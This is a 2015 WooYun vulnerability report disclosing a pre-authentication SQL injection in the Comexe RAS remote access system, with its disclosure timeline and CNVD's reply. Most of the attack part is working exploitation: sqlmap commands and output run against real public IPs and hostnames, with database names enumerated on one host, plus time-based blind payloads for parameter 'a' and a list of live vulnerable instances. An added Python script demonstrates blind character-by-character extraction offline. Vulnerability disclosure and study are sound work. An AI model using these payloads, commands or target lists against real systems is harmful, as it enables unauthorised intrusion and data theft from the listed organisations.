
Vulnerability summary

Defect ID: wooyun-2015-0126338

Title: Comexe (科迈) RAS Remote Fast Access System pre-authentication SQL injection

Vendor: 深圳市科迈通讯技术有限公司 (Shenzhen Comexe Communication Technology Co., Ltd.)

Author: xfkxfk

Submitted: 2015-07-15 11:57

Fix deadline: 2015-10-15 16:56

Published: 2015-10-15 16:56

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-15: Details sent to the vendor; awaiting vendor handling
2015-07-17: Vendor confirmed; details disclosed to the vendor only
2015-07-20: Details opened to third-party security partners
2015-09-10: Details opened to core white hats and domain experts
2015-09-20: Details opened to regular white hats
2015-09-30: Details opened to intern white hats
2015-10-15: Details opened to the public

Brief description:

Comexe (科迈) RAS Remote Fast Access System: SQL injection without login

Detailed description:

The standard-edition client of the Comexe (科迈) RAS Remote Fast Access System has a SQL injection in its login handler, reachable without logging in. The runs below hit /Server/CmxUserMap.php and inject through the GET parameter a.
Search keyword for locating exposed instances: 科迈RAS

[image: 1.png]


There are still plenty of instances out there. A few of them:

python sqlmap.py -u "http://218.91.204.132:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbms="mysql"
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[21:11:07] [INFO] testing 'MySQL UNION query (71) - 1 to 20 columns'
[21:11:16] [INFO] checking if the injection point on GET parameter 'a' is a false positive
GET parameter 'a' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 339 HTTP(s) requests:
---
Parameter: a (GET)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))JarV) AND 'aSBL'='aSBL&b=32&c=undefined&d=
---
[21:11:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
[21:11:39] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\218.91.204.132'
[*] shutting down at 21:11:39


python sqlmap.py -u "http://61.182.242.18:8080/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbms="mysql"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: a (GET)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))zwjn) AND 'NlSP'='NlSP&b=32&c=undefined&d=
---
[21:21:11] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[21:21:27] [INFO] confirming MySQL
[21:21:27] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[21:21:38] [INFO] adjusting time delay to 1 second due to good response times
[21:21:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[21:21:38] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\61.182.242.18'
[*] shutting down at 21:21:38


python sqlmap.py -u "http://tianyicnc.meibu.com:800/Server/CmxUserMap.php?t=&a=123&b=32&c=undefined&d=" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: a (GET)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: t=&a=123' AND (SELECT * FROM (SELECT(SLEEP(5)))orFh) AND 'RZuz'='RZuz&b=32&c=undefined&d=
---
[21:22:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.11
[21:22:52] [INFO] fetching database names
[21:22:52] [INFO] fetching number of databases
[21:22:52] [INFO] resumed: 3
[21:22:52] [INFO] resumed: information_schema
[21:22:52] [INFO] resumed: mysql
[21:22:52] [INFO] resumed: rasdatabase
available databases [3]:
[*] information_schema
[*] mysql
[*] rasdatabase
[21:22:52] [INFO] fetched data logged to text files under 'C:\Users\xfkxfk\.sqlmap\output\tianyicnc.meibu.com'
[*] shutting down at 21:22:52


[image: 2.png]
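The time-based payloads sqlmap reported above show that parameter a is injectable but not what is happening underneath. The following Python script is an editor's example added to this page, not code from the report or from the vendor; it replays the technique offline against a constructed stand-in for the login lookup. The vulnerable handler, the table ras_user, the seeded account, and the use of SQLite with a registered SLEEP() are all assumptions (the real backend is MySQL on Windows, as sqlmap fingerprinted it). It puts the unsafe string concatenation beside a parameterised version, confirms injectability the way sqlmap does (a true probe stalls, a false one does not), and then recovers a schema name one character at a time, which is the manual counterpart of the --dbs step.

```python
import sqlite3
import time

# Constructed stand-in for the RAS login backend: an in-memory SQLite database
# seeded with one account. MySQL's SLEEP() is registered as a user function so
# the time-based payload shape can be replayed offline; SLEEP(5) in a payload
# becomes a DELAY_SCALE*5 second stall here instead of a real five seconds.
DELAY_SCALE = 0.02
THRESHOLD = DELAY_SCALE * 5 / 2  # halfway between "no stall" and a full SLEEP(5)


def _sleep(seconds):
    time.sleep(seconds * DELAY_SCALE)
    return 0  # MySQL's SLEEP() also returns 0


def _make_db():
    db = sqlite3.connect(":memory:")
    db.create_function("SLEEP", 1, _sleep)
    db.execute("CREATE TABLE ras_user (name TEXT, pwd TEXT)")
    db.execute("INSERT INTO ras_user VALUES ('admin', 'constructed-secret')")
    return db


DB = _make_db()


def vulnerable_user_map(a):
    """Hypothetical reconstruction of the flaw: parameter a is pasted straight
    into the SQL text, which is the only way the sqlmap payload can work."""
    return DB.execute(f"SELECT name FROM ras_user WHERE name='{a}'").fetchall()


def fixed_user_map(a):
    """Same lookup with a bound parameter: the input can no longer alter the query."""
    return DB.execute("SELECT name FROM ras_user WHERE name=?", (a,)).fetchall()


def delays(handler, condition):
    """Time-based oracle. The injected tail is the MySQL IF(cond, SLEEP(5), 0)
    probe written as CASE, so the server stalls only when `condition` is true.
    OR is used instead of sqlmap's AND because the guessed value '123' matches
    no row and SQLite short-circuits the AND chain; MySQL evaluates the
    uncorrelated SLEEP subquery up front, which is why sqlmap's form works there."""
    payload = (f"123' OR (CASE WHEN ({condition}) THEN SLEEP(5) ELSE 0 END) "
               f"AND 'q'='q")
    t0 = time.monotonic()
    try:
        handler(payload)
    except sqlite3.Error:
        return False  # a broken query errors out immediately, no stall
    return time.monotonic() - t0 >= THRESHOLD


def confirm_injection(handler):
    """sqlmap's sanity check: a true probe must stall and a false one must not."""
    return delays(handler, "1=1") and not delays(handler, "1=2")


def extract(handler, expr, max_len=32):
    """Recover the string value of SQL expression `expr` one character at a
    time by binary search over its code point (7 probes per character).
    On MySQL the probe would read ASCII(SUBSTRING(...)); SQLite spells it
    unicode(substr(...))."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"unicode(substr(({expr}), {pos}, 1)) > {mid}"
            if delays(handler, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end yields '' -> NULL -> never stalls
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("vulnerable handler injectable:", confirm_injection(vulnerable_user_map))
    print("fixed handler injectable:", confirm_injection(fixed_user_map))
    # Counterpart of the report's --dbs step: enumerate schema names blind.
    print("first table:", extract(vulnerable_user_map,
                                  "SELECT name FROM sqlite_master WHERE type='table'"))
```

Against a real server the threshold has to be calibrated against network jitter, which is what sqlmap's "adjusting time delay to 1 second due to good response times" line above is doing; a too-small margin turns every slow response into a false "true" bit and corrupts the extracted string.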


Some affected instances:

http://218.91.204.132:8080/
http://202.103.252.103/
http://202.104.138.33/
http://221.226.23.10:81/
http://222.184.237.178:81/
http://114.80.129.171:8080
http://124.160.67.214
http://58.251.164.97/
http://115.238.32.206:8888/
http://202.104.138.40/
http://221.226.184.125:81/
......

Proof of vulnerability:

[image: 2.png]

Remediation:

Copyright notice: please credit xfkxfk@乌云 (WooYun) when reposting.


Response

Vendor response:

Severity: High

Rank: 11

Confirmed: 2015-07-17 16:55

Vendor reply:

CNVD confirms the reported vulnerability. No direct handling channel with the software vendor has been established yet; awaiting claim.

Latest status:

None